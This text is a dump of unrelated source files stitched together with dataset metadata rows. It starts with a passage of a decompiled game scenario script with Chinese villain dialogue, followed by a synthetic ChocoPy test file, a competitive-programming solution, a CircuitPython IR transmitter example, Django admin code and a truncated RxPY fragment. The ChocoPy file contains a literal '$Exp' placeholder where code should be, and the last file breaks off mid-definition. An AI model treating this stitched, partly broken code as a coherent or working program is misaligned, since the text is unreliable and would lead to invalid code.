Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT27/CH04510 ._CH', # 00
'ED6_DT06/CH20020 ._CH', # 01
'ED6_DT27/CH04000 ._CH', # 02
'ED6_DT27/CH04010 ._CH', # 03
)
AddCharChipPat(
'ED6_DT27/CH04510P._CP', # 00
'ED6_DT06/CH20020P._CP', # 01
'ED6_DT27/CH04000P._CP', # 02
'ED6_DT27/CH04010P._CP', # 03
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 458753,
ChipIndex = 0x1,
NpcIndex = 0x1E6,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
ScpFunction(
"Function_0_12A", # 00, 0
"Function_1_142", # 01, 1
"Function_2_160", # 02, 2
"Function_3_1029", # 03, 3
"Function_4_10B0", # 04, 4
)
def Function_0_12A(): pass
label("Function_0_12A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x21E, 0)), scpexpr(EXPR_END)), "loc_141")
OP_A3(0x10F0)
OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x53), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Event(0, 2)
label("loc_141")
Return()
# Function_0_12A end
def Function_1_142(): pass
label("Function_1_142")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x400, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_156")
OP_B1("C1707_y")
Jump("loc_15F")
label("loc_156")
OP_B1("C1707_n")
label("loc_15F")
Return()
# Function_1_142 end
def Function_2_160(): pass
label("Function_2_160")
EventBegin(0x0)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x240, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x240, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_177")
Call(0, 3)
Call(0, 4)
label("loc_177")
OP_82(0x80, 0x0)
OP_82(0x82, 0x0)
OP_72(0x9, 0x4)
OP_72(0x8, 0x4)
OP_71(0x7, 0x4)
OP_71(0x2, 0x4)
OP_71(0x3, 0x4)
OP_71(0x4, 0x4)
OP_71(0x5, 0x4)
OP_71(0x6, 0x4)
OP_79(0x0, 0x2)
OP_79(0x1, 0x2)
OP_79(0x2, 0x2)
OP_79(0x3, 0x2)
OP_79(0x4, 0x2)
OP_7B()
LoadEffect(0x1, "map\\\\mp021_00.eff")
LoadEffect(0x2, "map\\\\mp064_01.eff")
LoadEffect(0x3, "map\\\\mp065_01.eff")
LoadEffect(0x4, "map\\\\mp064_00.eff")
LoadEffect(0x5, "map\\\\mp065_00.eff")
OP_72(0x0, 0x4)
OP_A1(0xA, 0x0)
SetChrPos(0xA, 10580, 500, 9330, 225)
OP_71(0x0, 0x20)
OP_B0(0x0, 0x14)
OP_6F(0x0, 381)
OP_70(0x0, 0x1A4)
ClearChrFlags(0xA, 0x80)
SetChrFlags(0xA, 0x1)
OP_51(0xA, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_OR), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0xA, 0x7, (scpexpr(EXPR_PUSH_LONG, 0x1770), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0xA, 0x34, (scpexpr(EXPR_PUSH_LONG, 0xEA60), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
ClearMapFlags(0x40)
SetChrPos(0x101, 1200, 0, 1200, 45)
SetChrPos(0x102, 870, 0, 2560, 45)
SetChrPos(0xF8, -50, 0, 110, 45)
SetChrPos(0xF9, -450, 0, 1740, 45)
SetChrSubChip(0x101, 0)
SetChrChipByIndex(0x101, 65535)
SetChrSubChip(0x102, 0)
SetChrChipByIndex(0x102, 65535)
SetChrSubChip(0xF8, 0)
SetChrChipByIndex(0xF8, 65535)
SetChrSubChip(0xF9, 0)
SetChrChipByIndex(0xF9, 65535)
SetChrPos(0x8, 1220, 950, 12420, 0)
ClearChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x10)
SetChrChipByIndex(0x8, 0)
SetChrSubChip(0x8, 0)
ClearChrFlags(0x8, 0x1)
OP_CF(0x8, 0x0, "Frame85__ren")
OP_51(0x8, 0x24, (scpexpr(EXPR_PUSH_LONG, 0xA5), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_6D(34920, 250, 12030, 0)
OP_67(0, 9500, -10000, 0)
OP_6B(3960, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
OP_22(0x1C3, 0x0, 0x64)
def lambda_386():
OP_6D(6260, 250, 8340, 5000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_386)
def lambda_39E():
OP_67(0, 5950, -10000, 5000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_39E)
def lambda_3B6():
OP_6B(4940, 5000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_3B6)
FadeToBright(1000, 0)
OP_0D()
Sleep(1000)
WaitChrThread(0x101, 0x0)
Fade(500)
OP_71(0x8, 0x4)
OP_6D(7230, 250, 9770, 0)
OP_67(0, 3510, -10000, 0)
OP_6B(5260, 0)
OP_6C(32000, 0)
OP_6E(243, 0)
OP_0D()
Sleep(500)
ChrTalk( #0
0x101,
"#1026F#5P恢、恢复了……\x02",
)
CloseMessageWindow()
ChrTalk( #1
0x102,
"#1042F#5P『塔』已经解放了吗……\x02",
)
CloseMessageWindow()
ChrTalk( #2
0x8,
(
"#1302F#6P……真无趣。\x02\x03",
"时间再多一点的话,\x01",
"就能把你们全部杀光了。\x02",
)
)
CloseMessageWindow()
Sleep(500)
OP_22(0x113, 0x1, 0x46)
OP_22(0x114, 0x0, 0x64)
PlayEffect(0x1, 0x0, 0xA, 0, -500, 0, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_22(0xCC, 0x0, 0x64)
PlayEffect(0x4, 0x1, 0xA, 4950, 2800, 0, 0, 0, 20, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x2, 0xA, -4950, 2800, 0, 0, 0, 340, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
Sleep(500)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(100)
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF8)"), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5BB")
OP_62(0xF8, 0x0, 2300, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_5F9")
label("loc_5BB")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF8)"), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5E2")
OP_62(0xF8, 0x0, 1700, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_5F9")
label("loc_5E2")
OP_62(0xF8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
label("loc_5F9")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF9)"), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_620")
OP_62(0xF9, 0x0, 2300, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_65E")
label("loc_620")
Jc((scpexpr(EXPR_EXEC_OP, "OP_CB(0xF9)"), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_647")
OP_62(0xF9, 0x0, 1700, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Jump("loc_65E")
label("loc_647")
OP_62(0xF9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
label("loc_65E")
Sleep(1000)
def lambda_669():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_669)
def lambda_677():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_677)
Sleep(100)
def lambda_68A():
OP_8C(0xFE, 45, 400)
ExitThread()
QueueWorkItem(0xF8, 1, lambda_68A)
OP_8C(0xF9, 45, 400)
ChrTalk( #3
0x101,
"#1005F#5P慢、慢着!?\x02",
)
CloseMessageWindow()
ChrTalk( #4
0x8,
(
"#1306F#6P哈哈哈……\x01",
"玲要回『古罗力亚斯』了。\x02\x03",
"教授说过,『β』一旦完成\x01",
"就让玲回去的。\x02",
)
)
CloseMessageWindow()
ChrTalk( #5
0x101,
"#1020F#5P教、教授!?\x02",
)
CloseMessageWindow()
ChrTalk( #6
0x102,
(
"#1044F#5P『β』已经完成了……\x02\x03",
"#1046F恢复『塔』的原样\x01",
"也是计划的一部分吗!?\x02",
)
)
CloseMessageWindow()
ChrTalk( #7
0x8,
(
"#263F#6P谁知道?\x01",
"玲也不怎么清楚。\x02\x03",
"#1305F不过,听说笼罩这里的结界\x01",
"是『环』的“手”。\x02",
)
)
CloseMessageWindow()
ChrTalk( #8
0x101,
"#1026F#5P『辉之环』的……手!?\x02",
)
CloseMessageWindow()
ChrTalk( #9
0x8,
(
"#261F#6P嘻嘻……\x01",
"会是什么意思呢?\x02",
)
)
CloseMessageWindow()
OP_4F(0x1C, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
ClearMapFlags(0x10)
def lambda_836():
OP_6D(11800, 4800, 10810, 3000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_836)
def lambda_84E():
OP_67(0, 3560, -10000, 3000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_84E)
def lambda_866():
OP_6B(3450, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_866)
def lambda_876():
OP_6C(41000, 3000)
ExitThread()
QueueWorkItem(0x102, 2, lambda_876)
def lambda_886():
OP_6E(325, 3000)
ExitThread()
QueueWorkItem(0x102, 3, lambda_886)
PlayEffect(0x2, 0x1, 0xA, 5000, 2500, 0, 0, 0, 20, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x2, 0xA, -4900, 2500, 0, 0, 0, 340, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
def lambda_900():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x1F4, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_900)
Sleep(300)
def lambda_920():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x2EE, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_920)
Sleep(300)
def lambda_940():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_940)
OP_24(0x113, 0x50)
Sleep(100)
OP_72(0x0, 0x20)
OP_D8(0x0, 0x1F4)
OP_6F(0x0, 241)
OP_70(0x0, 0x104)
OP_82(0x0, 0x2)
Sleep(50)
PlayEffect(0x2, 0x1, 0xA, 4600, 2600, 0, 0, 0, 18, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x2, 0xA, -4600, 2600, 0, 0, 0, 342, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
Sleep(250)
def lambda_9F2():
OP_8F(0xFE, 0x2954, 0x9C4, 0x2472, 0x2EE, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_9F2)
OP_24(0x113, 0x5A)
Sleep(100)
OP_24(0x113, 0x64)
WaitChrThread(0xA, 0x1)
WaitChrThread(0x101, 0x1)
SetChrSubChip(0x8, 0)
WaitChrThread(0x101, 0x1)
Sleep(500)
ChrTalk( #10
0x8,
(
"#263F#5P哈哈哈,那么再见了。\x02\x03",
"#1304F下次见面时──\x01",
"我会把你们全部杀掉。\x02",
)
)
CloseMessageWindow()
def lambda_A80():
OP_8C(0xFE, 80, 10)
ExitThread()
QueueWorkItem(0xA, 2, lambda_A80)
Sleep(200)
def lambda_A93():
OP_8C(0xFE, 80, 15)
ExitThread()
QueueWorkItem(0xA, 2, lambda_A93)
Sleep(200)
def lambda_AA6():
OP_8C(0xFE, 80, 20)
ExitThread()
QueueWorkItem(0xA, 2, lambda_AA6)
Sleep(500)
def lambda_AB9():
OP_8C(0xFE, 80, 30)
ExitThread()
QueueWorkItem(0xA, 2, lambda_AB9)
Sleep(100)
def lambda_ACC():
OP_8C(0xFE, 80, 40)
ExitThread()
QueueWorkItem(0xA, 2, lambda_ACC)
Sleep(2500)
Fade(500)
OP_6D(16090, 5040, 13150, 0)
OP_67(0, 3440, -10000, 0)
OP_6B(3690, 0)
OP_6C(39000, 0)
OP_6E(325, 0)
ClearChrFlags(0xA, 0x1)
def lambda_B26():
OP_8C(0xFE, 80, 20)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B26)
Sleep(500)
def lambda_B39():
OP_8C(0xFE, 80, 15)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B39)
Sleep(500)
def lambda_B4C():
OP_8C(0xFE, 80, 10)
ExitThread()
QueueWorkItem(0xA, 2, lambda_B4C)
WaitChrThread(0xA, 0x2)
def lambda_B5F():
OP_6B(3900, 4000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_B5F)
OP_72(0x0, 0x20)
OP_D8(0x0, 0x1F4)
OP_6F(0x0, 261)
OP_70(0x0, 0x118)
OP_22(0x116, 0x0, 0x64)
OP_73(0x0)
Sleep(500)
PlayEffect(0x3, 0x0, 0xA, 500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x3, 0xA, -500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x4, 0xA, 1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x5, 0xA, 400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x6, 0xA, -1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x4, 0x7, 0xA, -400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_22(0x114, 0x0, 0x64)
Sleep(2000)
PlayEffect(0x2, 0x0, 0xA, 500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x2, 0x3, 0xA, -500, -3300, -3600, 0, 80, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x4, 0xA, 1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x5, 0xA, 400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x6, 0xA, -1000, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x3, 0x7, 0xA, -400, -2600, -3000, 0, 70, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
OP_71(0x0, 0x20)
OP_6F(0x0, 281)
OP_70(0x0, 0x12C)
OP_82(0x1, 0x2)
OP_82(0x2, 0x2)
Sleep(500)
def lambda_E37():
OP_6D(16040, 8000, 13170, 3000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_E37)
def lambda_E4F():
OP_67(0, 690, -10000, 3000)
ExitThread()
QueueWorkItem(0x101, 1, lambda_E4F)
def lambda_E67():
OP_6C(75000, 3000)
ExitThread()
QueueWorkItem(0x101, 2, lambda_E67)
def lambda_E77():
OP_6E(548, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_E77)
def lambda_E87():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_E87)
Sleep(100)
def lambda_EA7():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0xFA0, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EA7)
Sleep(100)
def lambda_EC7():
OP_8F(0xFE, 0x16F2D8, 0x61A8, 0x5064, 0x1F40, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EC7)
Sleep(100)
def lambda_EE7():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0x2710, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_EE7)
Sleep(100)
def lambda_F07():
OP_8F(0xFE, 0x25968, 0x61A8, 0x5064, 0x32C8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F07)
Sleep(100)
def lambda_F27():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x4650, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F27)
Sleep(100)
def lambda_F47():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x59D8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F47)
Sleep(100)
def lambda_F67():
OP_8F(0xFE, 0x25968, 0x7530, 0x5064, 0x6D60, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F67)
Sleep(100)
def lambda_F87():
OP_8F(0xFE, 0x25968, 0x9C40, 0x5064, 0x80E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_F87)
Sleep(100)
def lambda_FA7():
OP_8F(0xFE, 0x25968, 0x9C40, 0x5064, 0x9470, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FA7)
Sleep(100)
def lambda_FC7():
OP_8F(0xFE, 0x25968, 0xC350, 0x5064, 0xA7F8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FC7)
Sleep(100)
def lambda_FE7():
OP_8F(0xFE, 0x25968, 0xC350, 0x5064, 0xBB80, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_FE7)
WaitChrThread(0xA, 0x1)
WaitChrThread(0x101, 0x1)
FadeToDark(1000, 0, -1)
OP_0D()
OP_A2(0x1E24)
SetMapFlags(0x100000)
OP_A2(0x10FF)
OP_A2(0x10F5)
NewScene("ED6_DT21/E0810 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_2_160 end
def Function_3_1029(): pass
label("Function_3_1029")
FadeToDark(0, 0, -1)
OP_A3(0x1200)
OP_A3(0x1201)
RemoveParty(0x2, 0xFF)
RemoveParty(0x5, 0xFF)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Menu(
0,
10,
100,
0,
(
"【◇选择雪拉扎德为队友】\x01", # 0
"【◇选择阿加特为队友】\x01", # 1
)
)
MenuEnd(0x0)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_5F(0x0)
OP_56(0x0)
Switch(
(scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)),
(0, "loc_10A3"),
(1, "loc_10A9"),
(SWITCH_DEFAULT, "loc_10AF"),
)
label("loc_10A3")
OP_A2(0x1200)
Jump("loc_10AF")
label("loc_10A9")
OP_A2(0x1201)
Jump("loc_10AF")
label("loc_10AF")
Return()
# Function_3_1029 end
def Function_4_10B0(): pass
label("Function_4_10B0")
FadeToDark(0, 0, -1)
OP_6D(-66940, 250, 36210, 0)
OP_67(0, 6500, -10000, 0)
OP_6B(3700, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
Sleep(200)
FadeToBright(0, 0)
OP_0D()
OP_C9(0x0, 0x4, 0x0, 0x1, 0xFF, 0xFF, 0x5, 0x2, 0x6, 0x4, 0x7, 0x8, 0xFFFF)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
FadeToDark(0, 0, -1)
OP_69(0x0, 0x0)
Return()
# Function_4_10B0 end
SaveToFile()
Try(main)
| [
"[email protected]"
] | |
084d1e9466ab51b588f6b9e5ee5775e6b2032af3 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/exp-big-987.py | 98a30d699cfa98b31b62bcdabb1a8d73c564b701 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,178 | py | # Compute x**y
def exp(x: int, y: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp2(x: int, y: int, x2: int, y2: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp3(x: int, y: int, x2: int, y2: int, x3: int, y3: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp4(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f($Exp)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp5(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int, x5: int, y5: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
# Input parameter
n:int = 42
n2:int = 42
n3:int = 42
n4:int = 42
n5:int = 42
# Run [0, n]
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
while i <= n:
print(exp(2, i % 31))
i = i + 1 | [
"[email protected]"
] | |
a6754e24060dada2bc601f991212c3b62a574c61 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02927/s825032151.py | 0c0da2fdaf320f22fbbb8c13954eeb5e830d6169 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | M, D = map(int, input().split())
def f(m, d):
d1, d10 = d % 10, d // 10
return d1 >= 2 and d10 >= 2 and d1 * d10 == m
count = 0
for i in range(1, M+1):
for j in range(1, D + 1):
count += 1 if f(i, j) else 0
print(count) | [
"[email protected]"
] | |
f37ce077214372ee2aa95bf55c151a14a1b54739 | 49cb4e39c562c0cca9b8eaf09aeb10689d3f8e8f | /test/expr.py | 3911c63c184a67db061627b9626c0d1f66507423 | [] | no_license | 2020saurav/py-codegen | 2df470025e60bb157522de5eb92a467646bbd181 | dca61d31faf41bd05aff8399daed3612211d77c2 | refs/heads/master | 2021-01-01T20:11:01.476604 | 2015-04-14T18:28:08 | 2015-04-14T18:28:08 | 33,630,589 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | a = 100
while a > 0:
if a % 5 == 0:
print a
if a%37 == 0:
break
a = a - 1
print a | [
"[email protected]"
] | |
f5321f3e48bf46ddb5a487c404d82dbee8b6acfd | 0124528676ee3bbaec60df5d6950b408e6da37c8 | /Projects/QTPy/adafruit-circuitpython-bundle-7.x-mpy-20220601/examples/irremote_transmit.py | 9595f492cf2210c7860dca7d88ef446d35ffbe60 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | land-boards/lb-boards | 8127658dc537dcfde0bb59a5018ab75c3f0087f6 | eeb98cc2003dac1924845d949f6f5bd387376568 | refs/heads/master | 2023-06-07T15:44:46.110742 | 2023-06-02T22:53:24 | 2023-06-02T22:53:24 | 4,847,305 | 10 | 12 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""IR transmit example using Circuit Playground Express"""
# pylint: disable-msg=no-member
import time
import pulseio
import pwmio
import board
import digitalio
import adafruit_irremote
# Create a button object to trigger IR transmit
button = digitalio.DigitalInOut(board.D4)
button.direction = digitalio.Direction.INPUT
button.pull = digitalio.Pull.DOWN
# Create a 'pwmio' output, to send infrared signals on the IR transmitter @ 38KHz
pwm = pwmio.PWMOut(board.IR_TX, frequency=38000, duty_cycle=2**15)
pulseout = pulseio.PulseOut(pwm)
# Create an encoder that will take numbers and turn them into NEC IR pulses
encoder = adafruit_irremote.GenericTransmit(
header=[9500, 4500], one=[550, 550], zero=[550, 1700], trail=0
)
while True:
if button.value:
print("IR signal sent!")
encoder.transmit(pulseout, [255, 2, 255, 0])
time.sleep(0.2)
| [
"[email protected]"
] | |
8b3821d319dca7c778f383c3838af711f2438bfd | 56f998d88a4cdae9f2c99b6f2013a10b90f227a2 | /network/admin.py | 8010ed3923c1ded4a1326c43ba9b78eac1fbe675 | [] | no_license | lautarodapin/network-course-cs50 | a45cfa675b7ff475ee1600276cbf47eb19fca7d9 | 2994c6b44eb46f4d303621a4e48604aa672017ea | refs/heads/main | 2023-04-02T06:42:14.599721 | 2021-04-09T20:57:18 | 2021-04-09T20:57:18 | 355,749,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Post, User, Comment
class CommentInline(admin.TabularInline):
model = Comment
extra = 0
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = [
"id",
"content",
"likes",
"user",
]
inlines = [CommentInline]
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
list_display = [
"id",
"username",
]
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = [
"id",
"comment",
"user",
"post",
]
| [
"[email protected]"
] | |
97afbf06615fccf029968bf34a0bc4e21e70c552 | 5c74f8526f185d90093aba3fb213a11de5ea18ba | /rx/operators/observable/observeon.py | 8455b848d1b064d10076f186fa1593f02c7659e2 | [
"Apache-2.0"
] | permissive | yutiansut/RxPY | df02c64cb791bf2a7a97413a75f4d2903e1682b5 | c3bbba77f9ebd7706c949141725e220096deabd4 | refs/heads/master | 2020-03-10T11:07:27.642494 | 2018-12-29T07:02:02 | 2018-12-29T07:02:02 | 129,349,161 | 0 | 0 | NOASSERTION | 2018-12-29T07:02:03 | 2018-04-13T04:50:02 | Python | UTF-8 | Python | false | false | 794 | py | from rx.core import AnonymousObservable, ObservableBase
from rx.core.observeonobserver import ObserveOnObserver
def observe_on(source, scheduler) -> ObservableBase:
